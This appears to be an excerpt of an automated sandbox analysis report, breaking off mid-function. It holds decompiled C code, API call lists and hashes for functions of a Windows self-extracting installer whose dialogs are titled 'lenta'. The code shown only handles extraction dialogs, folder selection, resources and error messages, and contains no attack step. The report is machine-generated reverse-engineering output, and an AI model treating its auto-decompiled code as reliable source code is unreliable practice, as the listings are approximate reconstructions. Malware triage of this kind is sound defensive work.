                              • Instruction ID: 4b8449008859c847cf3a163ef4e382dfca948fc55b83a7d7be811277e8f9b286
                              • Opcode Fuzzy Hash: 59dfc0629528aaa5e850fa9ab406f4c0ed401beb6ab5f5d5bb49d15789566b91
                              • Instruction Fuzzy Hash: E2111C71E01208DFCB60DFBAD648A9EBBF5EF48755F614896E945EB204E639DA008B40
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E010E6CF0(struct _EXCEPTION_POINTERS* _a4) {
                              
                              				SetUnhandledExceptionFilter(0);
                              				UnhandledExceptionFilter(_a4);
                              				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                              			}

                              APIs
                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,010E6E26,010E1000), ref: 010E6CF7
                              • UnhandledExceptionFilter.KERNEL32(010E6E26,?,010E6E26,010E1000), ref: 010E6D00
                              • GetCurrentProcess.KERNEL32(C0000409,?,010E6E26,010E1000), ref: 010E6D0B
                              • TerminateProcess.KERNEL32(00000000,?,010E6E26,010E1000), ref: 010E6D12
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                              • String ID:
                              • API String ID: 3231755760-0
                              • Opcode ID: 4256383c90560ef298ee571f180b28767e999ef690b8cbd7222af590c038e8df
                              • Instruction ID: 134a8639d65a58b90c3bf0469e1580467ebce5c6cc1869e1ed42b328be7a0bd5
                              • Opcode Fuzzy Hash: 4256383c90560ef298ee571f180b28767e999ef690b8cbd7222af590c038e8df
                              • Instruction Fuzzy Hash: 94D0C932200108FBDB202BE2E80CA593FA8EB8DA92F454085F3598B004CA3BC4518B51
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 76%
                              			E010E3210(struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12) {
                              				void* __edi;
                              				void* _t6;
                              				void* _t10;
                              				int _t20;
                              				int _t21;
                              				int _t23;
                              				char _t24;
                              				long _t25;
                              				int _t27;
                              				int _t30;
                              				void* _t32;
                              				int _t33;
                              				int _t34;
                              				int _t37;
                              				int _t38;
                              				int _t39;
                              				void* _t42;
                              				void* _t46;
                              				CHAR* _t49;
                              				void* _t58;
                              				void* _t63;
                              				struct HWND__* _t64;
                              
                              				_t64 = _a4;
                              				_t6 = _a8 - 0x10;
                              				if(_t6 == 0) {
                              					_push(0);
                              					L38:
                              					EndDialog(_t64, ??);
                              					L39:
                              					__eflags = 1;
                              					return 1;
                              				}
                              				_t42 = 1;
                              				_t10 = _t6 - 0x100;
                              				if(_t10 == 0) {
                              					E010E43D0(_t64, GetDesktopWindow());
                              					SetWindowTextA(_t64, "lenta");
                              					SendDlgItemMessageA(_t64, 0x835, 0xc5, 0x103, 0);
                              					__eflags =  *0x10e9a40 - _t42; // 0x3
                              					if(__eflags == 0) {
                              						EnableWindow(GetDlgItem(_t64, 0x836), 0);
                              					}
                              					L36:
                              					return _t42;
                              				}
                              				if(_t10 == _t42) {
                              					_t20 = _a12 - 1;
                              					__eflags = _t20;
                              					if(_t20 == 0) {
                              						_t21 = GetDlgItemTextA(_t64, 0x835, 0x10e91e4, 0x104);
                              						__eflags = _t21;
                              						if(_t21 == 0) {
                              							L32:
                              							_t58 = 0x4bf;
                              							_push(0);
                              							_push(0x10);
                              							_push(0);
                              							_push(0);
                              							L25:
                              							E010E44B9(_t64, _t58);
                              							goto L39;
                              						}
                              						_t49 = 0x10e91e4;
                              						do {
                              							_t23 =  *_t49;
                              							_t49 =  &(_t49[1]);
                              							__eflags = _t23;
                              						} while (_t23 != 0);
                              						__eflags = _t49 - 0x10e91e5 - 3;
                              						if(_t49 - 0x10e91e5 < 3) {
                              							goto L32;
                              						}
                              						_t24 =  *0x10e91e5; // 0x3a
                              						__eflags = _t24 - 0x3a;
                              						if(_t24 == 0x3a) {
                              							L21:
                              							_t25 = GetFileAttributesA(0x10e91e4);
                              							__eflags = _t25 - 0xffffffff;
                              							if(_t25 != 0xffffffff) {
                              								L26:
                              								E010E658A(0x10e91e4, 0x104, 0x10e1140);
                              								_t27 = E010E58C8(0x10e91e4);
                              								__eflags = _t27;
                              								if(_t27 != 0) {
                              									__eflags =  *0x10e91e4 - 0x5c;
                              									if( *0x10e91e4 != 0x5c) {
                              										L30:
                              										_t30 = E010E597D(0x10e91e4, 1, _t64, 1);
                              										__eflags = _t30;
                              										if(_t30 == 0) {
                              											L35:
                              											_t42 = 1;
                              											__eflags = 1;
                              											goto L36;
                              										}
                              										L31:
                              										_t42 = 1;
                              										EndDialog(_t64, 1);
                              										goto L36;
                              									}
                              									__eflags =  *0x10e91e5 - 0x5c;
                              									if( *0x10e91e5 == 0x5c) {
                              										goto L31;
                              									}
                              									goto L30;
                              								}
                              								_push(0);
                              								_push(0x10);
                              								_push(0);
                              								_push(0);
                              								_t58 = 0x4be;
                              								goto L25;
                              							}
                              							_t32 = E010E44B9(_t64, 0x54a, 0x10e91e4, 0, 0x20, 4);
                              							__eflags = _t32 - 6;
                              							if(_t32 != 6) {
                              								goto L35;
                              							}
                              							_t33 = CreateDirectoryA(0x10e91e4, 0);
                              							__eflags = _t33;
                              							if(_t33 != 0) {
                              								goto L26;
                              							}
                              							_push(0);
                              							_push(0x10);
                              							_push(0);
                              							_push(0x10e91e4);
                              							_t58 = 0x4cb;
                              							goto L25;
                              						}
                              						__eflags =  *0x10e91e4 - 0x5c;
                              						if( *0x10e91e4 != 0x5c) {
                              							goto L32;
                              						}
                              						__eflags = _t24 - 0x5c;
                              						if(_t24 != 0x5c) {
                              							goto L32;
                              						}
                              						goto L21;
                              					}
                              					_t34 = _t20 - 1;
                              					__eflags = _t34;
                              					if(_t34 == 0) {
                              						EndDialog(_t64, 0);
                              						 *0x10e9124 = 0x800704c7;
                              						goto L39;
                              					}
                              					__eflags = _t34 != 0x834;
                              					if(_t34 != 0x834) {
                              						goto L36;
                              					}
                              					_t37 = LoadStringA( *0x10e9a3c, 0x3e8, 0x10e8598, 0x200);
                              					__eflags = _t37;
                              					if(_t37 != 0) {
                              						_t38 = E010E4224(_t64, _t46, _t46);
                              						__eflags = _t38;
                              						if(_t38 == 0) {
                              							goto L36;
                              						}
                              						_t39 = SetDlgItemTextA(_t64, 0x835, 0x10e87a0);
                              						__eflags = _t39;
                              						if(_t39 != 0) {
                              							goto L36;
                              						}
                              						_t63 = 0x4c0;
                              						L9:
                              						E010E44B9(_t64, _t63, 0, 0, 0x10, 0);
                              						_push(0);
                              						goto L38;
                              					}
                              					_t63 = 0x4b1;
                              					goto L9;
                              				}
                              				return 0;
                              			}

                              APIs
                              • LoadStringA.USER32(000003E8,010E8598,00000200), ref: 010E3271
                              • GetDesktopWindow.USER32 ref: 010E33E2
                              • SetWindowTextA.USER32(?,lenta), ref: 010E33F7
                              • SendDlgItemMessageA.USER32(?,00000835,000000C5,00000103,00000000), ref: 010E3410
                              • GetDlgItem.USER32(?,00000836), ref: 010E3426
                              • EnableWindow.USER32(00000000), ref: 010E342D
                              • EndDialog.USER32(?,00000000), ref: 010E343F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Window$Item$DesktopDialogEnableLoadMessageSendStringText
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$lenta
                              • API String ID: 2418873061-2614117474
                              • Opcode ID: 145b4d2bdf9ffb034c02ce211f3fddbffdfc3fd4da29a022d9a17e58b1c0d5f1
                              • Instruction ID: 1fa387ff40097ebe925d4292f55383f98a591a15c6cc6a97118c38790048bd7e
                              • Opcode Fuzzy Hash: 145b4d2bdf9ffb034c02ce211f3fddbffdfc3fd4da29a022d9a17e58b1c0d5f1
                              • Instruction Fuzzy Hash: C951B370341240AEE7725A3B5C4CFBF6DD9BB89B54F4080A9F6C59F2C5CEA9D8019361
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E010E2CAA(struct HINSTANCE__* __ecx, void* __edx, void* __eflags) {
                              				signed int _v8;
                              				char _v268;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t13;
                              				void* _t20;
                              				void* _t23;
                              				void* _t27;
                              				struct HRSRC__* _t31;
                              				intOrPtr _t33;
                              				void* _t43;
                              				void* _t48;
                              				signed int _t65;
                              				struct HINSTANCE__* _t66;
                              				signed int _t67;
                              
                              				_t13 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t13 ^ _t67;
                              				_t65 = 0;
                              				_t66 = __ecx;
                              				_t48 = __edx;
                              				 *0x10e9a3c = __ecx;
                              				memset(0x10e9140, 0, 0x8fc);
                              				memset(0x10e8a20, 0, 0x32c);
                              				memset(0x10e88c0, 0, 0x104);
                              				 *0x10e93ec = 1;
                              				_t20 = E010E468F("TITLE", 0x10e9154, 0x7f);
                              				if(_t20 == 0 || _t20 > 0x80) {
                              					_t64 = 0x4b1;
                              					goto L32;
                              				} else {
                              					_t27 = CreateEventA(0, 1, 1, 0);
                              					 *0x10e858c = _t27;
                              					SetEvent(_t27);
                              					_t64 = 0x10e9a34;
                              					if(E010E468F("EXTRACTOPT", 0x10e9a34, 4) != 0) {
                              						if(( *0x10e9a34 & 0x000000c0) == 0) {
                              							L12:
                              							 *0x10e9120 =  *0x10e9120 & _t65;
                              							if(E010E5C9E(_t48, _t48, _t65, _t66) != 0) {
                              								if( *0x10e8a3a == 0) {
                              									_t31 = FindResourceA(_t66, "VERCHECK", 0xa);
                              									if(_t31 != 0) {
                              										_t65 = LoadResource(_t66, _t31);
                              									}
                              									if( *0x10e8184 != 0) {
                              										__imp__#17();
                              									}
                              									if( *0x10e8a24 == 0) {
                              										_t57 = _t65;
                              										if(E010E36EE(_t65) == 0) {
                              											goto L33;
                              										} else {
                              											_t33 =  *0x10e9a40; // 0x3
                              											_t48 = 1;
                              											if(_t33 == 1 || _t33 == 2 || _t33 == 3) {
                              												if(( *0x10e9a34 & 0x00000100) == 0 || ( *0x10e8a38 & 0x00000001) != 0 || E010E18A3(_t64, _t66) != 0) {
                              													goto L30;
                              												} else {
                              													_t64 = 0x7d6;
                              													if(E010E6517(_t57, 0x7d6, _t34, E010E19E0, 0x547, 0x83e) != 0x83d) {
                              														goto L33;
                              													} else {
                              														goto L30;
                              													}
                              												}
                              											} else {
                              												L30:
                              												_t23 = _t48;
                              											}
                              										}
                              									} else {
                              										_t23 = 1;
                              									}
                              								} else {
                              									E010E2390(0x10e8a3a);
                              									goto L33;
                              								}
                              							} else {
                              								_t64 = 0x520;
                              								L32:
                              								E010E44B9(0, _t64, 0, 0, 0x10, 0);
                              								goto L33;
                              							}
                              						} else {
                              							_t64 =  &_v268;
                              							if(E010E468F("INSTANCECHECK",  &_v268, 0x104) == 0) {
                              								goto L3;
                              							} else {
                              								_t43 = CreateMutexA(0, 1,  &_v268);
                              								 *0x10e8588 = _t43;
                              								if(_t43 == 0 || GetLastError() != 0xb7) {
                              									goto L12;
                              								} else {
                              									if(( *0x10e9a34 & 0x00000080) == 0) {
                              										_t64 = 0x524;
                              										if(E010E44B9(0, 0x524, ?str?, 0, 0x20, 4) == 6) {
                              											goto L12;
                              										} else {
                              											goto L11;
                              										}
                              									} else {
                              										_t64 = 0x54b;
                              										E010E44B9(0, 0x54b, "lenta", 0, 0x10, 0);
                              										L11:
                              										CloseHandle( *0x10e8588);
                              										 *0x10e9124 = 0x800700b7;
                              										goto L33;
                              									}
                              								}
                              							}
                              						}
                              					} else {
                              						L3:
                              						_t64 = 0x4b1;
                              						E010E44B9(0, 0x4b1, 0, 0, 0x10, 0);
                              						 *0x10e9124 = 0x80070714;
                              						L33:
                              						_t23 = 0;
                              					}
                              				}
                              				return E010E6CE0(_t23, _t48, _v8 ^ _t67, _t64, _t65, _t66);
                              			}




















                              APIs
                              • memset.MSVCRT ref: 010E2CD9
                              • memset.MSVCRT ref: 010E2CE9
                              • memset.MSVCRT ref: 010E2CF9
                                • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46A0
                                • Part of subcall function 010E468F: SizeofResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46A9
                                • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46C3
                                • Part of subcall function 010E468F: LoadResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46CC
                                • Part of subcall function 010E468F: LockResource.KERNEL32(00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46D3
                                • Part of subcall function 010E468F: memcpy_s.MSVCRT ref: 010E46E5
                                • Part of subcall function 010E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46EF
                              • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E2D34
                              • SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,00000002,00000000), ref: 010E2D40
                              • CreateMutexA.KERNEL32(00000000,00000001,?,00000104,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 010E2DAE
                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 010E2DBD
                              • CloseHandle.KERNEL32(lenta,00000000,00000020,00000004,?,?,?,?,?,?,?,00000002,00000000), ref: 010E2E0A
                                • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: Resource$memset$CreateEventFindLoad$CloseErrorFreeHandleLastLockMessageMutexSizeofStringmemcpy_s
                              • String ID: EXTRACTOPT$INSTANCECHECK$TITLE$VERCHECK$lenta
                              • API String ID: 1002816675-2993962200
                              • Opcode ID: f6904a70dfa99ee7dd9c7edf99ff9a0223097247fde51a6f186ecf565e7c7c03
                              • Instruction ID: 01148ec295ee094816655b86a1042b53477751706ba9d9cd9aa7aab56bc868e4
                              • Opcode Fuzzy Hash: f6904a70dfa99ee7dd9c7edf99ff9a0223097247fde51a6f186ecf565e7c7c03
                              • Instruction Fuzzy Hash: 7451D7703403119EF774AA279D4DB7A3ADCEB95B04F04806DE6C1DA2C9DAB9C8418751
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 81%
                              			E010E34F0(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                              				void* _t9;
                              				void* _t12;
                              				void* _t13;
                              				void* _t17;
                              				void* _t23;
                              				void* _t25;
                              				struct HWND__* _t35;
                              				struct HWND__* _t38;
                              				void* _t39;
                              
                              				_t9 = _a8 - 0x10;
                              				if(_t9 == 0) {
                              					__eflags = 1;
                              					L19:
                              					_push(0);
                              					 *0x10e91d8 = 1;
                              					L20:
                              					_push(_a4);
                              					L21:
                              					EndDialog();
                              					L22:
                              					return 1;
                              				}
                              				_push(1);
                              				_pop(1);
                              				_t12 = _t9 - 0xf2;
                              				if(_t12 == 0) {
                              					__eflags = _a12 - 0x1b;
                              					if(_a12 != 0x1b) {
                              						goto L22;
                              					}
                              					goto L19;
                              				}
                              				_t13 = _t12 - 0xe;
                              				if(_t13 == 0) {
                              					_t35 = _a4;
                              					 *0x10e8584 = _t35;
                              					E010E43D0(_t35, GetDesktopWindow());
                              					__eflags =  *0x10e8184; // 0x1
                              					if(__eflags != 0) {
                              						SendMessageA(GetDlgItem(_t35, 0x83b), 0x464, 0, 0xbb9);
                              						SendMessageA(GetDlgItem(_t35, 0x83b), 0x465, 0xffffffff, 0xffff0000);
                              					}
                              					SetWindowTextA(_t35, "lenta");
                              					_t17 = CreateThread(0, 0, E010E4FE0, 0, 0, 0x10e8798);
                              					 *0x10e879c = _t17;
                              					__eflags = _t17;
                              					if(_t17 != 0) {
                              						goto L22;
                              					} else {
                              						E010E44B9(_t35, 0x4b8, 0, 0, 0x10, 0);
                              						_push(0);
                              						_push(_t35);
                              						goto L21;
                              					}
                              				}
                              				_t23 = _t13 - 1;
                              				if(_t23 == 0) {
                              					__eflags = _a12 - 2;
                              					if(_a12 != 2) {
                              						goto L22;
                              					}
                              					ResetEvent( *0x10e858c);
                              					_t38 =  *0x10e8584; // 0x0
                              					_t25 = E010E44B9(_t38, 0x4b2, 0x10e1140, 0, 0x20, 4);
                              					__eflags = _t25 - 6;
                              					if(_t25 == 6) {
                              						L11:
                              						 *0x10e91d8 = 1;
                              						SetEvent( *0x10e858c);
                              						_t39 =  *0x10e879c; // 0x0
                              						E010E3680(_t39);
                              						_push(0);
                              						goto L20;
                              					}
                              					__eflags = _t25 - 1;
                              					if(_t25 == 1) {
                              						goto L11;
                              					}
                              					SetEvent( *0x10e858c);
                              					goto L22;
                              				}
                              				if(_t23 == 0xe90) {
                              					TerminateThread( *0x10e879c, 0);
                              					EndDialog(_a4, _a12);
                              					return 1;
                              				}
                              				return 0;
                              			}













                              APIs
                              • TerminateThread.KERNEL32(00000000), ref: 010E3535
                              • EndDialog.USER32(?,?), ref: 010E3541
                              • ResetEvent.KERNEL32 ref: 010E355F
                              • SetEvent.KERNEL32(010E1140,00000000,00000020,00000004), ref: 010E3590
                              • GetDesktopWindow.USER32 ref: 010E35C7
                              • GetDlgItem.USER32(?,0000083B), ref: 010E35F1
                              • SendMessageA.USER32(00000000), ref: 010E35F8
                              • GetDlgItem.USER32(?,0000083B), ref: 010E3610
                              • SendMessageA.USER32(00000000), ref: 010E3617
                              • SetWindowTextA.USER32(?,lenta), ref: 010E3623
                              • CreateThread.KERNEL32 ref: 010E3637
                              • EndDialog.USER32(?,00000000), ref: 010E3671
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: DialogEventItemMessageSendThreadWindow$CreateDesktopResetTerminateText
                              • String ID: lenta
                              • API String ID: 2406144884-2780258678
                              • Opcode ID: 26b12be7d6d6d3ed9bc90a98439116592647ca92a32535a1c2a6a875e194e4d1
                              • Instruction ID: 1b70ce64f3507b84bd6f05b036b60da2e33cd2aff80eb21ccddd88e7c98fb504
                              • Opcode Fuzzy Hash: 26b12be7d6d6d3ed9bc90a98439116592647ca92a32535a1c2a6a875e194e4d1
                              • Instruction Fuzzy Hash: 91314C71240201AFD7701A3BAC4DE6A3EE9F789F51F14856AF6D29F298CA7A8400CB54
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 50%
                              			E010E4224(char __ecx) {
                              				char* _v8;
                              				_Unknown_base(*)()* _v12;
                              				_Unknown_base(*)()* _v16;
                              				_Unknown_base(*)()* _v20;
                              				char* _v28;
                              				intOrPtr _v32;
                              				intOrPtr _v36;
                              				intOrPtr _v40;
                              				char _v44;
                              				char _v48;
                              				char _v52;
                              				_Unknown_base(*)()* _t26;
                              				_Unknown_base(*)()* _t28;
                              				_Unknown_base(*)()* _t29;
                              				_Unknown_base(*)()* _t32;
                              				char _t42;
                              				char* _t44;
                              				char* _t61;
                              				void* _t63;
                              				char* _t65;
                              				struct HINSTANCE__* _t66;
                              				char _t67;
                              				void* _t71;
                              				char _t76;
                              				intOrPtr _t85;
                              
                              				_t67 = __ecx;
                              				_t66 = LoadLibraryA("SHELL32.DLL");
                              				if(_t66 == 0) {
                              					_t63 = 0x4c2;
                              					L22:
                              					E010E44B9(_t67, _t63, 0, 0, 0x10, 0);
                              					return 0;
                              				}
                              				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                              				_v12 = _t26;
                              				if(_t26 == 0) {
                              					L20:
                              					FreeLibrary(_t66);
                              					_t63 = 0x4c1;
                              					goto L22;
                              				}
                              				_t28 = GetProcAddress(_t66, 0xc3);
                              				_v20 = _t28;
                              				if(_t28 == 0) {
                              					goto L20;
                              				}
                              				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                              				_v16 = _t29;
                              				if(_t29 == 0) {
                              					goto L20;
                              				}
                              				_t76 =  *0x10e88c0; // 0x0
                              				if(_t76 != 0) {
                              					L10:
                              					 *0x10e87a0 = 0;
                              					_v52 = _t67;
                              					_v48 = 0;
                              					_v44 = 0;
                              					_v40 = 0x10e8598;
                              					_v36 = 1;
                              					_v32 = E010E4200;
                              					_v28 = 0x10e88c0;
                              					 *0x10ea288( &_v52);
                              					_t32 =  *_v12();
                              					if(_t71 != _t71) {
                              						asm("int 0x29");
                              					}
                              					_v12 = _t32;
                              					if(_t32 != 0) {
                              						 *0x10ea288(_t32, 0x10e88c0);
                              						 *_v16();
                              						if(_t71 != _t71) {
                              							asm("int 0x29");
                              						}
                              						if( *0x10e88c0 != 0) {
                              							E010E1680(0x10e87a0, 0x104, 0x10e88c0);
                              						}
                              						 *0x10ea288(_v12);
                              						 *_v20();
                              						if(_t71 != _t71) {
                              							asm("int 0x29");
                              						}
                              					}
                              					FreeLibrary(_t66);
                              					_t85 =  *0x10e87a0; // 0x0
                              					return 0 | _t85 != 0x00000000;
                              				} else {
                              					GetTempPathA(0x104, 0x10e88c0);
                              					_t61 = 0x10e88c0;
                              					_t4 =  &(_t61[1]); // 0x10e88c1
                              					_t65 = _t4;
                              					do {
                              						_t42 =  *_t61;
                              						_t61 =  &(_t61[1]);
                              					} while (_t42 != 0);
                              					_t5 = _t61 - _t65 + 0x10e88c0; // 0x21d1181
                              					_t44 = CharPrevA(0x10e88c0, _t5);
                              					_v8 = _t44;
                              					if( *_t44 == 0x5c &&  *(CharPrevA(0x10e88c0, _t44)) != 0x3a) {
                              						 *_v8 = 0;
                              					}
                              					goto L10;
                              				}
                              			}





























                              APIs
                              • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 010E4236
                              • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 010E424C
                              • GetProcAddress.KERNEL32(00000000,000000C3), ref: 010E4263
                              • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 010E427A
                              • GetTempPathA.KERNEL32(00000104,010E88C0,?,00000001), ref: 010E429F
                              • CharPrevA.USER32(010E88C0,021D1181,?,00000001), ref: 010E42C2
                              • CharPrevA.USER32(010E88C0,00000000,?,00000001), ref: 010E42D6
                              • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 010E4391
                              • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 010E43A5
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.447567133.00000000010E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010E0000, based on PE: true
                              • Associated: 00000000.00000002.447560896.00000000010E0000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447574667.00000000010E8000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EA000.00000002.00000001.01000000.00000003.sdmp
                              • Associated: 00000000.00000002.447580308.00000000010EC000.00000002.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_10e0000_file.jbxd
                              Similarity
                              • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                              • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                              • API String ID: 1865808269-1731843650
                              • Opcode ID: ad80f56a3e8faefc51554de6a02f56c98bf753cb3afefae5156463bd93df60b5
                              • Instruction ID: 1e8417f2b3ce7bb1c750db8e4e6ed7a0506f1304daf51aa05c7828971f8009f2
                              • Opcode Fuzzy Hash: ad80f56a3e8faefc51554de6a02f56c98bf753cb3afefae5156463bd93df60b5
                              • Instruction Fuzzy Hash: 3941B574A00204AFE7619F7BE88C96EBFF4EB49744F04819EEAC1EB245C77988018761
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 94%
                              			E010E44B9(struct HWND__* __ecx, int __edx, intOrPtr* _a4, void* _a8, int _a12, signed int _a16) {
                              				signed int _v8;
                              				char _v64;
                              				char _v576;
                              				void* _v580;
                              				struct HWND__* _v584;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t34;
                              				void* _t37;
                              				signed int _t39;
                              				intOrPtr _t43;
                              				signed int _t44;
                              				signed int _t49;
                              				signed int _t52;
                              				void* _t54;
                              				intOrPtr _t55;
                              				intOrPtr _t58;
                              				intOrPtr _t59;
                              				int _t64;
                              				void* _t66;
                              				intOrPtr* _t67;
                              				signed int _t69;
                              				intOrPtr* _t73;
                              				intOrPtr* _t76;
                              				intOrPtr* _t77;
                              				void* _t80;
                              				void* _t81;
                              				void* _t82;
                              				intOrPtr* _t84;
                              				void* _t85;
                              				signed int _t89;
                              
                              				_t75 = __edx;
                              				_t34 =  *0x10e8004; // 0x9fdbf5b5
                              				_v8 = _t34 ^ _t89;
                              				_v584 = __ecx;
                              				_t83 = "LoadString() Error.  Could not load string resource.";
                              				_t67 = _a4;
                              				_t69 = 0xd;
                              				_t37 = memcpy( &_v64, _t83, _t69 << 2);
                              				_t80 = _t83 + _t69 + _t69;
                              				_v580 = _t37;
                              				asm("movsb");
                              				if(( *0x10e8a38 & 0x00000001) != 0) {
                              					_t39 = 1;
                              				} else {
                              					_v576 = 0;
                              					LoadStringA( *0x10e9a3c, _t75,  &_v576, 0x200);
                              					if(_v576 != 0) {
                              						_t73 =  &_v576;
                              						_t16 = _t73 + 1; // 0x1
                              						_t75 = _t16;
                              						do {
                              							_t43 =  *_t73;
                              							_t73 = _t73 + 1;
                              						} while (_t43 != 0);
                              						_t84 = _v580;
                              						_t74 = _t73 - _t75;
                              						if(_t84 == 0) {
                              							if(_t67 == 0) {
                              								_t27 = _t74 + 1; // 0x2
                              								_t83 = _t27;
                              								_t44 = LocalAlloc(0x40, _t83);
                              								_t80 = _t44;
                              								if(_t80 == 0) {
                              									goto L6;
                              								} else {
                              									_t75 = _t83;
                              									_t74 = _t80;
                              									E010E1680(_t80, _t83,  &_v576);
                              									goto L23;
                              								}
                              							} else {
                              								_t76 = _t67;
                              								_t24 = _t76 + 1; // 0x1
                              								_t85 = _t24;
                              								do {
                              									_t55 =  *_t76;
                              									_t76 = _t76 + 1;
                              								} while (_t55 != 0);
                              								_t25 = _t76 - _t85 + 0x64; // 0x65
                              								_t83 = _t25 + _t74;
                              								_t44 = LocalAlloc(0x40, _t25 + _t74);
                              								_t80 = _t44;
                              								if(_t80 == 0) {
                              									goto L6;
                              								} else {
                              									E010E171E(_t80, _t83,  &_v576, _t67);
                              									goto L23;
                              								}
                              							}
                              						} else {
                              							_t77 = _t67;
                              							_t18 = _t77 + 1; // 0x1
                              							_t81 = _t18;
                              							do {
                              								_t58 =  *_t77;
                              								_t77 = _t77 + 1;
                              							} while (_t58 != 0);
                              							_t75 = _t77 - _t81;
                              							_t82 = _t84 + 1;
                              							do {
                              								_t59 =  *_t84;
                              								_t84 = _t84 + 1;
                              							} while (_t59 != 0);
                              							_t21 = _t74 + 0x64; // 0x65
                              							_t83 = _t21 + _t84 - _t82 + _t75;
                              							_t44 = LocalAlloc(0x40, _t21 + _t84 - _t82 + _t75);
                              							_t80 = _t44;
                              							if(_t80 == 0) {
                              								goto L6;
                              							} else {
                              								_push(_v580);
                              								E010E171E(_t80, _t83,  &_v576, _t67);
                              								L23:
                              								MessageBeep(_a12);
                              								if(E010E681F(_t67) == 0) {
                              									L25:
                              									_t49 = 0x10000;
